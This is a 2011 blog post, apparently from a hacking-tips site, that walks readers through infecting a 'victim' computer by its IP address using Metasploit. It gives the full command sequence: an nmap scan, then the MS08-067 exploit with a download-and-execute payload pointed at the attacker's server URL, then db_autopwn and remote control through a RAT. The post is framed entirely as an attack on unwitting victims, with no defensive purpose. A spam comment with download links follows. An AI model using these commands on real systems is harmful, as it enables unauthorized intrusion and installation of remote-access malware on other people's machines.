Monday 24 January 2011

Infecting Your Victom through IP

Many of the times I saw this question asked here & everywhere on the Blog that
�Is it possible to infect victim using his IP address?�

So, I am going to show you how to do it.




First of all you need target ip of your victim.

Then open Metasploit Console & type db_create.

[Use: This�ll create or connect you to database.]

Once you do that type Nmap.

[Use: This�ll load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV

[This�ll scan OS, Ports, and Services running on victim�s computer.]
Wait for 5 min�s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim�s computer.

Now it�s time to exploit victim�s machine.

Exploit depends on the OS, Ports, and Services running on victim�s computer.
So, you�re lucky if you get OS WIN XP or 2000 because it�s easy to exploit them.
No matter weather they�re protected by any firewall or not.

Now I�ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)

Windows XP (all versions SP1, SP2, SP3)

Type show exploits

[Use: This�ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi

[Use: This�ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets

[Use: This�ll show all targets by exploit]

Now Type set target 0

[Use: This�ll set target to 0 specified]
Then type show payloads
[Use: This�ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This�ll set payload as windows/download_exec]

Then Type show options

[Use: This�ll show all options in the exploit & payload]
In window you�ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST

[Use: This�ll set RHOST (victim�s ip) to]

Next Type set URL
[Use: This�ll set URL to your direct server link.]

At last you need to type exploit

[Use: This will launch your exploit & your victim will be infected.]

You can now control you're victim with RAT.

So, any versions of Win 2000-XP can be exploited easily.
In case if you didn�t get this two OS�, immediately after Nmap scan
You can use the command db_autopwn �p �t �e.
In most cases you get a shell.

Good Luck!

1 comment:

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    Hacking Tips Tircks ,Software ,Games And Many More: Infecting Your Victom Through Ip >>>>> Download LINK

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    Hacking Tips Tircks ,Software ,Games And Many More: Infecting Your Victom Through Ip >>>>> Download Full

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